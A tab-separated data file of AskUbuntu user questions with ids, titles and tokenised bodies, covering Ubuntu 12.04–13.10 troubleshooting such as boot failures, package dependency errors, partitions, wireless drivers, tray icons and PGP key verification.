362120	screen with no usable configuration - ubuntu 12.04	i am running ubuntu 12.04 on my dell xps13 l322x ( installed onto a flash drive ) . however , at boot time , the screen just turns off . i was able to access the terminal through recovery mode though . i have tried several of the most common solutions that i 've seen on forums/askubuntu , in vain . please help me figure this out . thanks ! here is the content of my xorg.conf : http : //paste.ubuntu.com/6261683/ and here the contents of my xorg.0.log : http : //paste.ubuntu.com/6261689/
362122	ubuntu software center does not open	i recently ( 4 days ago ) bought a asus 10.1 laptop with ubuntu 1 already in it . however , since yesterday i can not open the ubuntu software center ( when i click on it , it tries to open , but then close up ) . on the top right end of the computer i got a error notification : an error occured : 'error : opening cache ( e : encountered a section with no package : header , e : problem with mergerlist/var/lib/apt/lists/extras.ubuntu.com_ubuntu_lists_precise_main_binary_i386_packages , e : the package lists or states file could not be passed or opened ) : this usually means that your instulled packages have unset dependencies . so , how do i resolve this ? i have no previous experience with ubuntu . do i need to download it again- and if so how do i go about it if the software center does not work ? any help will be most appreciated
362124	is there a way to find out root cause for ubuntu freeze ?	i have ubuntu 12.04 32 bit . i also have windows 7 which came with thinkpad edge e430 . time to time i get random freeze , where i need to restart my laptop . this has never happened in windows and that makes me more angry . i read about alt+sysreq+reisub , but i want to know why this specifically happens on ubuntu . how can i try to find it ?
362128	disk does n't contain a valid partition table - partition table entries are not in disk order	i am in need of some help . i am completely new to linux . i have created and installed a unbuntu 10.04 server as a virtual machine that is running in a citrix xenserver 5.6 fp1 environment . while i have struggled a bit here and there , everything seems to work ok . i have a proxy server running on this machine for my users , and i have recently added kerio mail server . this is where i found an issue . ( i think ) . while browsing the machines running processes using `` top '' it appeared to me that the entire amount of my memory was being maxed out , while my swap drive is never touched . i do recall during the setup of this machine that i did have a little trouble setting up the drives . by that i mean , i was n't feeling all warm and fuzzy that i did it right . well , i think now , i can definitely say that i think i have it wrong . it appears that my drives are a bit jacked up to say the least . here is the order of the `` jackedupness '' ... and below that is what i get when i run `` fdisk -l '' any help would be gratefully accepted . partition 1 does not end on cylinder boundary . partition table entries are not in disk order disk /dev/xvdd does n't contain a valid partition table $ sudo fdisk -l disk /dev/xvda : 193.3 gb , 193273528320 bytes 255 heads , 63 sectors/track , 23497 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000aa4f5 device boot start end blocks id system /dev/xvda1 1 32 248832 83 linux partition 1 does not end on cylinder boundary . /dev/xvda2 23255 23498 1951744 82 linux swap / solaris /dev/xvda3 32 23255 186540033 5 extended /dev/xvda5 32 23255 186540032 8e linux lvm partition table entries are not in disk order disk /dev/xvdd : 66 mb , 66891776 bytes 255 heads , 63 sectors/track , 8 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/xvdd does n't contain a valid partition table thank you in advance , casey sudo parted -l model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/ubuntu-tmp : 998mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 998mb 998mb ext3 model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/ubuntu-home : 5000mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 5000mb 5000mb ext3 model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/ubuntu-var : 160gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 160gb 160gb ext3 model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/ubuntu-root : 20.0gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 20.0gb 20.0gb ext3 model : xen virtual block device ( xvd ) disk /dev/xvda : 193gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 256mb 255mb primary ext3 3 257mb 191gb 191gb extended 5 257mb 191gb 191gb logical lvm 2 191gb 193gb 1999mb primary linux-swap ( v1 ) error : /dev/xvdd : unrecognised disk label results of the swapon -s swapon -s filename type size used priority /dev/xvda2 partition 1951736 0 -1 fstab contents # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/ubuntu-root / ext3 errors=remount-ro 0 1 # /boot was on /dev/xvda1 during installation uuid=762d244c-df00-401e-a06b-b4d98316b5b3 /boot ext3 defaults 0 2 /dev/mapper/ubuntu-home /home ext3 defaults 0 2 /dev/mapper/ubuntu-tmp /tmp ext3 defaults 0 2 /dev/mapper/ubuntu-var /var ext3 defaults 0 2 # swap was on /dev/xvda2 during installation uuid=87884241-3fa5-46c9-aef2-8144c08ac49c none swap sw 0 0
362129	after upgrade from 13.04 to 13.10 , bumblebee does n't work anymore	when i try to `` optirun steam '' , for instance , i get the following error : /usr/bin/env : error while loading shared libraries : libturbojpeg.so : can not open shared object file : no such file or directory does anyone know how to solve this problem so that i can use my good video card to run programs again ? thanks for your help , erik .
362130	ubuntu x64 installation	so my computer tells me that the processor is 64-bit capable , but it has 32-bit windows vista installed on it . would it be okay to install 64-bit ubuntu alongside 32-bit windows or would it have big negative effects on my computer ?
362134	error while installing lamp server	i purged my previous installation and when i wanted to install again i get the following error sudo apt-get install lamp-server^ reading package lists ... done building dependency tree reading state information ... done note , selecting 'libnet-daemon-perl ' for task 'lamp-server' note , selecting 'libwrap0 ' for task 'lamp-server' note , selecting 'mysql-server ' for task 'lamp-server' note , selecting 'perl ' for task 'lamp-server' note , selecting 'libcap2 ' for task 'lamp-server' note , selecting 'libdbi-perl ' for task 'lamp-server' note , selecting 'libapr1 ' for task 'lamp-server' note , selecting 'libhtml-template-perl ' for task 'lamp-server' note , selecting 'perl-modules ' for task 'lamp-server' note , selecting 'mysql-server-core-5.5 ' for task 'lamp-server' note , selecting 'libmysqlclient18 ' for task 'lamp-server' note , selecting 'tcpd ' for task 'lamp-server' note , selecting 'apache2.2-common ' for task 'lamp-server' note , selecting 'libclass-isa-perl ' for task 'lamp-server' note , selecting 'mysql-client-core-5.5 ' for task 'lamp-server' note , selecting 'ssl-cert ' for task 'lamp-server' note , selecting 'libdbd-mysql-perl ' for task 'lamp-server' note , selecting 'libswitch-perl ' for task 'lamp-server' note , selecting 'libplrpc-perl ' for task 'lamp-server' note , selecting 'mysql-common ' for task 'lamp-server' note , selecting 'mysql-server-5.5 ' for task 'lamp-server' note , selecting 'mysql-client-5.5 ' for task 'lamp-server' libapr1 is already the newest version . libcap2 is already the newest version . libclass-isa-perl is already the newest version . libdbi-perl is already the newest version . libhtml-template-perl is already the newest version . libnet-daemon-perl is already the newest version . libplrpc-perl is already the newest version . libswitch-perl is already the newest version . libwrap0 is already the newest version . tcpd is already the newest version . perl is already the newest version . perl-modules is already the newest version . ssl-cert is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : apache2.2-common : depends : apache2.2-bin ( = 2.2.22-1ubuntu1.4 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i googled to find the answer but got nothing , here it is said that its a ppa problem , i forgot how i installed it the first time , but when i looked in the /etc/apt/sources.list i did n't find something neither in the packages sources list , any help please ? edit : i have unheld ia32-libs and the command dpkg -- get-selections | grep hold return nothing . note : i tried to install apache2 with sudo apt-get install apache2 and there was no problem but with sudo apt-get install lamp-server^ i still get the error above .
362135	how to re-enable tray icons for applications in ubuntu 13.10 ?	unfortunately in ubuntu 13.10 there is no tray icon and whitelisting is removed . the older solutions do not work for me , e.g . i get the message : no such schema 'com.canonical.unity.panel ' when i try to use the command : gsettings set com.canonical.unity.panel systray-whitelist `` [ 'all ' ] '' how can i get tray icons back ( for applications that put an icon in the tray ( like truecrypt , pidgin , aqualung , gnome-system-monitor and so many more ) in unity ? the most annoying thing is that the user loses control over applications which can not themselves detect that they have no tray icon ( e.g . : gnome-system-monitor , truecrypt ... ) . at least aqualung sends a message about being unable to put an icon in the system tray !
362139	verifying pgp keys	i just reinstalled ubuntu so that i could take a more principled approach towards security with a fresh install . the problem that i am having now is feeling confident installing software that is n't in the default package repositories . right now i am trying to figure out truecrypt and spotify . my first attempt at asking for advice was regarding truecrypt and can be found on r/linux4noobs . unfortunately i did n't get any responses . truecrypt recommends checking the integrity of the installation tarball by downloading a signature , importing and signing their public key , and using something like 'gpg -- verify ' . i can download truecrypt 's public pgp key directly from their website ( sort of over https , but there does n't appear to be any sort of ssl cert -- public key download ) and confirm that it is the same one as is on mit 's pgp server . but since i have n't signed anyone else 's pgp key , there 's no way for me to know that the signatures that i see on mit 's pgp server for truecrypt are reliable . ( i mean , i assume that they are , but that 's not a great solution . ) so it feels like there must be some way to bootstrap this process ( without going to a keysigning event ) for someone like me who just wants to check the integrity of software that i download . i now realize the importance of keysigning events , but it seems there should be another way as well . for example , why do n't people/groups provide their public keys over https , using ssl certs as a bootstrapping mechanism ? in a similar vein , i am trying to install spotify natively . they recommend adding their key using : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 94558f59 but i assume this all happens in the clear , without any signing . checking signatures on their key , i used the following : $ sudo apt-key adv -- list-sigs ... pub 2048r/94558f59 2012-06-25 [ expires : 2015-06-25 ] uid spotify public repository signing key < operations @ spotify.com > sig 3 94558f59 2012-06-25 spotify public repository signing key < operations @ spotify.com > it appears that the only signature is a self-signature . again , i 'm left feeling that i 'm just kicking the can down the road . sure , i 'll be able to verify that the software i download was signed by the private key associated with the public key that i signed , but how do i gain confidence that the public key that i received belonged to who i thought it did ? i apologize for the wall of text , and if the answer is to read about pgp , i 'm happy to . and i apologize for omitting links . apparently without reputation only 2 links are allowed . thanks in advance for any help you can provide .
362141	ca n't get passed grub rescue , ca n't boot from disk , ca n't boot from anything , cant even get into boot option on my laptop	alright , so i orginally have an dell inspiron 17r and came with windows 8 , installed ubuntu , everything was fine , and then i accidentally made my main hardrive a `` swap disc '' while installing ubuntu , which cleared my harddrive , so i reinstalled windows 8 , ubuntu 's grub menu was the default to show up upon boot so i could choose what i wanted to load , i decided i wanted to reset my computer to factory settings through windows 8 , now upon restart , all that shows in the grub rescue > prompt and i 've already tried to find the ubuntu partition through the `` ls '' commands and looking through all of my partitions and it 's no where to be found . now i am constantly at this foresaken prompt and when i try to go into my laptops boot options , nothing happens and continues to send me to the grub prompt , once again , i can not boot from a disk or usb because i ca n't even get into my bios to tell my computer to do that . pleease help me , i 'm so unbelievably frustrated and have frantically been looking through forums and nothing has been able to help .
362142	new search tab page on chromium defaults to `` fvdsearch ? why ?	the url bar still uses google by default for search , but if i click ona suggested link or anything like that , it opens a new tab with fvdsearch as the search provider ? i do n't understand why . is it some kinda malware or something ? oh yeah , i 'm using 12.04 . = )
362146	how to install cowpatty ?	i want to install wifite , here but i ca n't install cowpatty see below : root @ vitor-hp : ~ # apt-get install cowpatty reading package lists ... ready building dependency tree reading state information ... ready e : could not find package cowpatty root @ vitor-hp : ~ # translated from portuguese i use ubuntu 13.10 64 bits .
362154	pdf comments and insert / delete / extract pages in evince	i use evince / ubuntu 12.04 at home . i use ( d ) all windows up to 7 except vista at work . pdfs are more widespread each year . evince is a great reader . business use needs office and acrobat standard capabilities . open office / libre office work great . i use pdf mod to delte / add / combine pdfs . true comments in pdfs seems to be missing . it would be better to have a native app vs a wine app . are there plans to add commenting and insert / extract / delete page capabilities to evince ? seems like that a serious missing part of ubuntu / linux .
362155	12.04 automount ext4	i have a secondary hard drive on my computer . it has a partition that is ext4 that i set up for ubuntu . i would like for it to be mounted automatically . i tried using the disk utility that i installed form the software center . but the version is only 3.0 and the new one that has the auto-mount feature is 3.8 , which is not available to 12.04 . how can u auto mount my ext4 partition that is on a secondary hard drive ? this is what the disk utility looks like .
362158	is it possible to run multiple vmware guests using free vmware player ?	i have a couple of premade win2k3 vms that i need to use for some application testing that need to be run at the same time on the same machine . i 'm running 13.04 desktop and do this often with virtualbox , whereby i run multiple instances at the same time . i assumed that i could do the same with vmware player ( i have version 6 ) , but quickly noticed that by default it only allows me to run one instance . is there a way to run multiple guests at the same time from player ? i do have an esxi server that i normally might use , but i need to be portable and it would be preferable to just have these run at the same time ...
362159	how to use unity tweak tool with ubuntu 13.04	any documentations on how to use unity tweak tool on ubuntu 13.04 ? i already installed it , can not find it on the applications menu , when trying to run it via terminal , it opens but these messages appeared first before opening : schema com.canonical.notify-osd not installed schema com.canonical.desktop.interface not installed also tried to use the opened interface , but do n't think it works .
362161	red alert 2 can not locate cd . previous answer not applicable	this has been asked before but updating to sp3 did not work for me . i am using virtualbox and have windows xp as the guest . i was able to get red alert 2 to install by enabling pass through on the cd . but now when i go to play it , it says it can not locate the cd . can anyone help . i have been working on this all day and i am no novice to computers ! i badly need some ideas . i have been able to get this program to work on a previous version of ubuntu and virtualbox 4.1 . on this computer i have the latest version of ubuntu and virtualbox 4.2 . by the way on the other computer one day red alert 2 stopped working with a message that i am runnning a debugger so it wo n't load . very frustrating .
362162	is there any printer logging system available for payment ?	i am living on a college and responsible for a shared printer solution . i am looking for a solution which can log every print done by users . the system needs to have some kind of logging system so i know who printed what . is there anything for cups already doing this ?
362167	changing 'switch language keys ' no longer working in 13.10	i have ubuntu 13.10 installed . from text entry settings i added arabic to keyboard layouts then tried to change the 'switch to next source using : ' field . i tried to set it to shift+caps lock and alt+shift and other combinations but no luck , it does not change , just leaves a blank field . i tried to change the keys from keyboard settings > typing > switch to next source , same results , whatever combinations i try it leaves the field disabled . how do i change the keys and fix this problem ? ? i never had this problem in any of previous ubuntu releases . hint : i had ubuntu 13.10 when it was still in beta and then updated to the last release , this problem existed all along . i do n't know if that can be relevant but just in case .
362170	input methods after upgrade to 13.10	after upgrading to 13.10 , ibus ( which had its own little icon in the task bar ) fails to load . instead i get a little icon , whose preferences direct me to `` text entry '' . when i try open the `` input method '' from the dash , it says : current configuration for the input method : active configuration : missing ( normally missing ) automatic configuration : ibus ( normally ibus or fcitx or uim ) number of valid choices : 2 ( normally 1 ) the configuration set by im-config is activated by re-starting x . explicit selection is not required to enable the automatic configuration if the active one is default/auto/cjkv/missing . available input methods : ibus xim unless you really need them all , please make sure to install only one input method tool . when searching for xim in the package manager i get no installed hits . how can i get rid of xim and get ibus again ? ( i can add my input method , anthy , via this new little icon , but i use a different keyboard layout , also to enter japanese text . )
362173	driver for canon pixma mg5520 needed	i 'm ready to go back to windows 7 if i ca n't get driver for my canon pixma mg5520 . ubuntu recognizes the printer but it is not in list of printers with available drivers .
362175	is there a keyboard shortcut to shutdown and reboot the computer ?	i am using ubuntu 13.10 64-bit and i would like to have a short cut that will restart the computer and one that will shutdown . i know how to make shortcuts in the keyboard settings , but i do n't know the command . thanks
362176	upgraded to 13.10 , now will not boot	please help , i updated to 13.10 something last night , now it will not boot . i ran the boot repair disk and the repair failed . this is the link to the file it created for help . http : //paste.ubuntu.com/6267366/ after the repair i now get a kernel panic error : not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) is there anything i can do to recover my system ?
362179	installing wireless card no gui : failed	i installed ubunutu 12.04 no gui . the release info is as follows : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise i custom installed ubuntu server in parts following the perfect server - ubuntu 12.04 lts instructions . everything works great using eth0 , but i have some difficulties with the installation and configuration of the wlan0 . my wireless card is linksys wpc600n dual band wireless-n . installed following packages : ndiswrapper-common ndiswrapper-utils-1.9 wireless-tools downloaded wireless drivers from linksys website and installed them : ndiswrapper -i bcmwl5.inf ndiswrapper -l warning : all config files need .conf : /etc/modprobe.d/blacklist , it will be ignored in a future release . bcmwl5 : driver installed device ( 14e4:4328 ) present ( alternate driver : ssb ) i blacklisted std driver : cat /etc/modprobe.d/blacklist blacklist bcm43xx i manually added ndiswrapper to the /etc/modules i also manually adjusted my /etc/network/interfaces . the file is as follows : my current network information is as follows : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.14.223 netmask 255.255.255.0 network 192.168.14.0 broadcast 192.168.14.255 gateway 192.168.14.84 dns-nameservers 8.8.8.8 8.8.4.4 iface wlan0 inet static address 192.168.14.222 netmask 255.255.255.0 network 192.168.14.0 broadcast 192.168.14.255 gateway 192.168.14.84 dns-nameservers 8.8.8.8 8.8.4.4 wpa-psk { network password } wpa-ssid { ssid } lspci | grep network 02:00.0 network controller : broadcom corporation bcm4321 802.11a/b/g/n ( rev 01 ) lspci -vvnn 00:00.0 host bridge [ 0600 ] : advanced micro devices , inc. [ amd/ati ] rs100 host bridge [ 1002 : cab0 ] ( rev 13 ) control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz+ udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 32 region 0 : memory at d4000000 ( 32-bit , prefetchable ) [ size=64m ] region 1 : memory at d0400000 ( 32-bit , prefetchable ) [ size=4k ] region 2 : i/o ports at 8090 [ disabled ] [ size=4 ] capabilities : [ a0 ] agp version 2.0 status : rq=16 iso- arqsz=0 cal=0 sba+ itacoh- gart64- htrans- 64bit- fw+ agp3- rate=x1 , x2 , x4 command : rq=1 arqsz=0 cal=0 sba+ agp+ gart64- 64bit- fw- rate=x4 kernel driver in use : agpgart-ati kernel modules : ati-agp 00:01.0 pci bridge [ 0604 ] : advanced micro devices , inc. [ amd/ati ] rs100 agp bridge [ 1002:700f ] ( rev 01 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz+ udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 99 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=68 i/o behind bridge : 00009000-00009fff memory behind bridge : d0100000-d01fffff prefetchable memory behind bridge : e0000000-efffffff secondary status : 66mhz+ fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa+ vga+ mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- kernel modules : shpchp 00:02.0 usb controller [ 0c03 ] : uli electronics inc. usb 1.1 controller [ 10b9:5237 ] ( rev 03 ) ( prog-if 10 [ ohci ] ) subsystem : hewlett-packard company pavilion ze4400 builtin usb [ 103c:0024 ] control : i/o+ mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 64 ( 20000ns max ) interrupt : pin a routed to irq 10 region 0 : memory at d0000000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : [ 60 ] power management version 2 flags : pmeclk- dsi- d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold+ ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- kernel driver in use : ohci_hcd 00:06.0 multimedia audio controller [ 0401 ] : uli electronics inc. m5451 pci ac-link controller audio device [ 10b9:5451 ] ( rev 02 ) subsystem : hewlett-packard company pavilion ze4400 builtin audio [ 103c:0024 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr+ < perr+ intx- latency : 64 ( 500ns min , 6000ns max ) interrupt : pin a routed to irq 5 region 0 : i/o ports at 8400 [ size=256 ] region 1 : memory at d0001000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : [ dc ] power management version 2 flags : pmeclk- dsi+ d1+ d2+ auxcurrent=0ma pme ( d0- , d1- , d2+ , d3hot+ , d3cold+ ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- kernel driver in use : snd_ali5451 kernel modules : snd-ali5451 00:07.0 isa bridge [ 0601 ] : uli electronics inc. m1533/m1535/m1543 pci to isa bridge [ aladdin iv/v/v+ ] [ 10b9:1533 ] subsystem : uli electronics inc. ali m1533 aladdin iv/v isa bridge [ 10b9:1533 ] control : i/o+ mem+ busmaster+ speccycle+ memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 capabilities : [ a0 ] power management version 1 flags : pmeclk- dsi- d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- kernel modules : alim7101_wdt , alim1535_wdt 00:08.0 modem [ 0703 ] : uli electronics inc. m5457 ac'97 modem controller [ 10b9:5457 ] ( prog-if 00 [ generic ] ) subsystem : hewlett-packard company pavilion ze4400 builtin modem device [ 103c:0024 ] control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin a routed to irq 3 region 0 : memory at d0002000 ( 32-bit , non-prefetchable ) [ size=4k ] region 1 : i/o ports at 8800 [ size=256 ] capabilities : [ 40 ] power management version 2 flags : pmeclk- dsi+ d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot+ , d3cold+ ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- 00:0a.0 cardbus bridge [ 0607 ] : o2 micro , inc. oz601/6912/711e0 cardbus/smartcardbus controller [ 1217:6972 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping+ serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=slow > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 168 interrupt : pin a routed to irq 11 region 0 : memory at 2c000000 ( 32-bit , non-prefetchable ) [ size=4k ] bus : primary=00 , secondary=02 , subordinate=05 , sec-latency=176 memory window 0 : 34000000-37fff000 ( prefetchable ) memory window 1 : 30000000-33fff000 i/o window 0 : 00001400-000014ff i/o window 1 : 00001000-000010ff bridgectl : parity- serr- isa- vga- mabort- > reset- 16bint- postwrite+ 16-bit legacy interface ports at 0001 kernel driver in use : yenta_cardbus kernel modules : yenta_socket 00:10.0 ide interface [ 0101 ] : uli electronics inc. m5229 ide [ 10b9:5229 ] ( rev c4 ) ( prog-if b0 ) subsystem : hewlett-packard company pavilion ze4400 builtin ide [ 103c:0024 ] control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 32 ( 500ns min , 1000ns max ) interrupt : pin a routed to irq 0 region 0 : [ virtual ] memory at 000001f0 ( 32-bit , non-prefetchable ) [ size=8 ] region 1 : [ virtual ] memory at 000003f0 ( type 3 , non-prefetchable ) [ size=1 ] region 2 : [ virtual ] memory at 00000170 ( 32-bit , non-prefetchable ) [ size=8 ] region 3 : [ virtual ] memory at 00000370 ( type 3 , non-prefetchable ) [ size=1 ] region 4 : i/o ports at 8080 [ size=16 ] capabilities : [ 60 ] power management version 2 flags : pmeclk- dsi- d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- kernel driver in use : pata_ali kernel modules : pata_ali 00:11.0 bridge [ 0680 ] : uli electronics inc. m7101 power management controller [ pmu ] [ 10b9:7101 ] subsystem : hewlett-packard company pavilion ze4400 [ 103c:0024 ] control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- kernel driver in use : ali1535_smbus kernel modules : alim7101_wdt , i2c-ali15x3 , i2c-ali1535 00:12.0 ethernet controller [ 0200 ] : national semiconductor corporation dp83815 ( macphyter ) ethernet controller [ 100b:0020 ] subsystem : hewlett-packard company pavilion ze4400 builtin network [ 103c:0024 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 90 ( 2750ns min , 13000ns max ) interrupt : pin a routed to irq 11 region 0 : i/o ports at 8c00 [ size=256 ] region 1 : memory at d0003000 ( 32-bit , non-prefetchable ) [ size=4k ] [ virtual ] expansion rom at 2c010000 [ disabled ] [ size=64k ] capabilities : [ 40 ] power management version 2 flags : pmeclk- dsi- d1+ d2+ auxcurrent=320ma pme ( d0+ , d1+ , d2+ , d3hot+ , d3cold+ ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme+ kernel driver in use : natsemi kernel modules : natsemi 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rs100 [ radeon igp 320m ] [ 1002:4336 ] ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company pavilion ze4400 builtin video [ 103c:0024 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping+ serr- fastb2b+ disintx- status : cap+ 66mhz+ udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 66 ( 2000ns min ) , cache line size : 64 bytes interrupt : pin a routed to irq 10 region 0 : memory at e0000000 ( 32-bit , prefetchable ) [ size=256m ] region 1 : i/o ports at 9000 [ size=256 ] region 2 : memory at d0100000 ( 32-bit , non-prefetchable ) [ size=64k ] [ virtual ] expansion rom at d0120000 [ disabled ] [ size=128k ] capabilities : [ 58 ] agp version 2.0 status : rq=48 iso- arqsz=0 cal=0 sba+ itacoh- gart64- htrans- 64bit- fw- agp3- rate=x1 , x2 , x4 command : rq=16 arqsz=0 cal=0 sba+ agp+ gart64- 64bit- fw- rate=x4 capabilities : [ 50 ] power management version 2 flags : pmeclk- dsi- d1+ d2+ auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- kernel driver in use : radeon kernel modules : radeon , radeonfb 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4321 802.11a/b/g/n [ 14e4:4328 ] ( rev 01 ) subsystem : linksys wpc600n v1 802.11a/b/g/n wireless-n cardbus adapter [ 1737:0066 ] control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 64 interrupt : pin a routed to irq 11 region 0 : memory at 30000000 ( 32-bit , non-prefetchable ) [ size=16k ] kernel driver in use : b43-pci-bridge kernel modules : ssb ip link 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 00:0d:9d:5b : a5 : f7 brd ff : ff : ff : ff : ff : ff 3 : wlan0 : < broadcast , multicast > mtu 1500 qdisc noop state down qlen 1000 link/ether 00:1e : e5 : aa : b9 : c5 brd ff : ff : ff : ff : ff : ff iwconfig lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on eth0 no wireless extensions . when i try to start wlan0 i get following message : ifup wlan0 wpa_supplicant : /sbin/wpa_supplicant daemon failed to start run-parts : /etc/network/if-pre-up.d/wpasupplicant exited with return code 1 rtnetlink answers : file exists failed to bring up wlan0 . i also tried : ip link set wlan0 up rtnetlink answers : no such file or directory sudo modprobe -r ndiswrapper warning : all config files need .conf : /etc/modprobe.d/blacklist , it will be ignored in a future release . fatal : module ndiswrapper not found . modprobe ndiswrapper warning : all config files need .conf : /etc/modprobe.d/blacklist , it will be ignored in a future release . fatal : module ndiswrapper not found . i am new to linux environment . i looked all over the place reading through documentation but was not able to figure out where i failed to properly configure or install package . any help will be greatly appreciated .
362183	how to install lsb-rpm	i am trying to install oracle 11g . i have downloaded the lsb-rpm package from http : //security.ubuntu.com/ubuntu/pool/universe/r/rpm/lsb-rpm_4.7.2-1lubuntu0.1_amd64.deb . but i get the following errors while trying to install it : $ sudo dpkg -i lsb-rpm_4.7.2-1lubuntu0.1_amd64.deb selecting previously unselected package lsb-rpm . ( reading database ... 174215 files and directories currently installed . ) unpacking lsb-rpm ( from lsb-rpm_4.7.2-1lubuntu0.1_amd64.deb ) ... dpkg : dependency problems prevent configuration of lsb-rpm : lsb-rpm depends on libdb4.8 ; however : package libdb4.8 is not installed . lsb-rpm depends on liblzma1 ( > = 4.999.9beta+20091116 ) ; however : package liblzma1 is not installed . lsb-rpm depends on libnss3-1d ( > = 3.12.2~rc1 ) ; however : package libnss3-1d is not installed .
362187	why ca n't i extend my desktop 12.04 in kde ?	my display settings has no options to not mirror my screens . there is just no option for not mirroring my screens . the options are : turn on resolution refresh rate i looked around for some graphic card or screen specific options and found none . i want to set up dual monitor . i am using kubuntu 12.04 64-bit with nvidia geforce gt 540m .
362189	xbmc is slowing ubuntu down after a few hours	i 'm running ubuntu 12.04 and xbmc 11.0 eden . after running xbmc for a few hours i have to go to my system monitor and kill xbmc.bin to have my machine resume at normal speed . what i am not understanding i have 8gb of memory , and only running 3 % of system resources when using xbmc . does anyone have any ideas where i should start ?
